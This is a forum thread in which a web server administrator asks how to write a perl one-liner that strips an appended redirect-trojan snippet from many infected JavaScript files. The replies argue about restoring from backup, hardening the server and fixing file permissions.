how to remove hacking code from multiple files

Hello,

I've located with clamav multiple .js files infected at the end with the above (JS.Trojan.Redir-3) code


I would like to remove all of these with a shell command.

I would use as an example this one :

find /vhosts -type f -name '*.js' -print0 | xargs -0 perl -i -0777pe 's|(.*)/\*km0ae9gr6m\*/.*|$1\n|s'

but I'm not sure what to change with all the escape characters and the * symbols.

Any help would be appreciated.

Suggestion: if this is java for an application remove the app completely and then re-install. Assuming these are required for some application that users need, you could break the application by trying to uninject code.

If new files just magically appeared then delete the whole files.

However the code got injected, there are some problems on the system with permissions, or someone is surfing the net with privilege, or working on questionable sites. You need to block the behavior or change file permissions that put the code there.

And consider hardening your system.

Yeah, restore from backup or re-install. Would you ever really trust those files again? I wouldn't.

I'm not asking for opinions on whether I should harden the server or delete the files.
My question is specifically about removing specific text from multiple files with shell/script.
Maybe the text wouldn't be hack code, maybe it would be a poem; still I want to do the same thing, removing specific text from multiple files with shell/script.

Please accept my sincere apologies for the impetuosity of my young and inexperienced colleagues who tried to help you. Of course they were wrong.

To strictly answer your question: use any text-editing tool you like, including (but not limited to): awk, sed, perl, ed, ex, vi, ... All of these tools can be invoked as shell commands.

If you are not sure, I suggest you use another tool with which you are. Replace "perl" with "awk", "sed" or any other of the aforementioned text filters until you find one with which you are indeed sure, then use that one. To suggest one would largely be a matter of opinion and you specifically did not ask for that, so I will keep my completely arbitrary personal pejoratives to myself.

I hope this helps.

bakunin

It's "good" to see you have spare time for irony;
it has nothing to do with helping, but of course everyone can post everything he likes.

While posting here in the forum I see

I'm sure they did put it there for a reason, so the replies I got were about the security of the server and not about the correct usage of perl
find /vhosts -type f -name '*.js' -print0 | xargs -0 perl -i -0777pe 's|(.*)/\*km0ae9gr6m\*/.*|$1\n|s'

I know you got insulted for a reason I cannot explain with my previous post, but my question was specific and I was trying to narrow down the possible answers.

Someone could also reply that I should not use javascript
or that I shouldn't use linux servers,
but that would be no help at all, would it?

If I was sure of another tool or the exact command,
I wouldn't post this, asking for people who know how to use it correctly,
would I?

If there was an easy magic do-everything fix for you, we'd give it to you so you could get it fixed and stop insulting us.

It's not "opinion". I've dealt with this before. These kinds of malware infections are designed to be difficult to detect and remove. When I ran into a situation like this where the customer had no backups, I wrestled with it for days, but removing the bad parts kept breaking the pages, and it made efforts to put itself back that made everything worse than when I started. I eventually had to track down the original .zip files for the software -- thank goodness the internet is huge, some data-packrat somewhere or other is likely to have anything -- replace everything with a .php extension, and remove everything else newer than 90 days old.

Then afterwards, I secured the permissions properly so it wouldn't happen again...